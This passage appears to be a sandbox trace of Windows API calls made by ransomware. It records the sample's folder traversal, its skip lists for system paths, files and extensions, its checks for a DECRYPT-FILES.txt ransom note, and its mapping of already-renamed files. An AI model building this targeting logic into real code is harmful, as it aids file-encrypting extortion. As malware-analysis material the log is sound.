9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Program Files") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch=":\\Windows") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Games\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\All Users") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="AhnLab") returned 0x0 [0184.740] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.740] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.740] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.740] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\0a16c9.tmp") returned 75 [0184.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0184.741] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.741] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.741] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\DECRYPT-FILES.txt") returned 82 [0184.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.741] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*" [0184.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0xf0d12920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d12920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0184.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.741] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0xf0d12920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d12920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.741] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.741] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.741] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0d12920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0d12920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d12920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.741] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.742] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.742] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.742] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.742] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.742] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.742] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.742] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.742] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0184.742] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\0a16c9.tmp" [0184.742] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.742] CloseHandle (hObject=0x0) returned 0 [0184.742] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.742] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc22b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadc22b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadc48c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.742] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.742] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ac0a270, ftCreationTime.dwHighDateTime=0x1d4d577, ftLastAccessTime.dwLowDateTime=0x5010cd60, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0xadc48c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2d23, dwReserved0=0x0, dwReserved1=0x0, cFileName="hyQ_D.png.OeDv", cAlternateFileName="HYQ_DP~1.OED")) returned 1 [0184.742] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="DECRYPT-FILES.txt") returned 1 [0184.742] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="autorun.inf") returned 1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="boot.ini") returned 1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="desktop.ini") returned 1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="ntuser.dat") returned -1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="iconcache.db") returned -1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="bootsect.bak") returned 1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="ntuser.dat.log") returned -1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="thumbs.db") returned -1 [0184.743] lstrcmpiW (lpString1="hyQ_D.png.OeDv", lpString2="Bootfont.bin") returned 1 [0184.743] lstrlenW (lpString="hyQ_D.png.OeDv") returned 14 [0184.743] lstrcmpiW (lpString1="OeDv", lpString2="lnk") returned 1 [0184.743] lstrcmpiW (lpString1="OeDv", lpString2="exe") returned 1 [0184.743] lstrcmpiW (lpString1="OeDv", lpString2="sys") returned -1 [0184.743] lstrcmpiW (lpString1="OeDv", lpString2="dll") returned 1 [0184.743] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.743] lstrlenW (lpString="hyQ_D.png.OeDv") returned 14 [0184.743] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0184.743] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="hyQ_D.png.OeDv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png.OeDv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png.OeDv" [0184.743] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png.OeDv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\hyq_d.png.oedv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0184.743] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=11555) returned 1 [0184.744] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0184.744] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.744] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.744] CloseHandle (hObject=0x270) returned 1 [0184.744] CloseHandle (hObject=0x26c) returned 1 [0184.744] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.745] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5634c860, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0x52b530f0, ftLastAccessTime.dwHighDateTime=0x1d4cf95, ftLastWriteTime.dwLowDateTime=0xadc6ede0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb144, dwReserved0=0x0, dwReserved1=0x0, cFileName="rES2CsWP4V9F.ppt.m3Lgp", cAlternateFileName="RES2CS~1.M3L")) returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="DECRYPT-FILES.txt") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="autorun.inf") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="boot.ini") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="desktop.ini") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="ntuser.dat") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="iconcache.db") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="bootsect.bak") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="ntuser.dat.log") returned 1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="thumbs.db") returned -1 [0184.745] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt.m3Lgp", lpString2="Bootfont.bin") returned 1 [0184.745] lstrlenW (lpString="rES2CsWP4V9F.ppt.m3Lgp") returned 22 [0184.745] lstrcmpiW (lpString1="m3Lgp", lpString2="lnk") returned 1 [0184.745] lstrcmpiW (lpString1="m3Lgp", lpString2="exe") returned 1 [0184.745] lstrcmpiW (lpString1="m3Lgp", lpString2="sys") returned -1 [0184.745] lstrcmpiW (lpString1="m3Lgp", lpString2="dll") returned 1 [0184.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0184.745] lstrlenW (lpString="rES2CsWP4V9F.ppt.m3Lgp") returned 22 [0184.745] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0184.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="rES2CsWP4V9F.ppt.m3Lgp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt.m3Lgp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt.m3Lgp" [0184.745] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt.m3Lgp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\res2cswp4v9f.ppt.m3lgp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0184.746] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=45380) returned 1 [0184.746] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0184.746] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.747] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.747] CloseHandle (hObject=0x270) returned 1 [0184.747] CloseHandle (hObject=0x26c) returned 1 [0184.747] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.747] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xadd79780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadd79780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wMOo1ftKNq", cAlternateFileName="WMOO1F~1")) returned 1 [0184.747] lstrcmpW (lpString1="wMOo1ftKNq", lpString2=".") returned 1 [0184.747] lstrcmpW (lpString1="wMOo1ftKNq", lpString2="..") returned 1 [0184.747] lstrcatW (in: lpString1="wMOo1ftKNq", lpString2="\\" | out: lpString1="wMOo1ftKNq\\") returned="wMOo1ftKNq\\" [0184.747] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Program Files") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch=":\\Windows") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Games\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\All Users") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="AhnLab") returned 0x0 [0184.747] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.748] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.748] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.748] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\0a16c9.tmp") returned 86 [0184.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0184.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.750] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.750] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\DECRYPT-FILES.txt") returned 93 [0184.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*" [0184.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 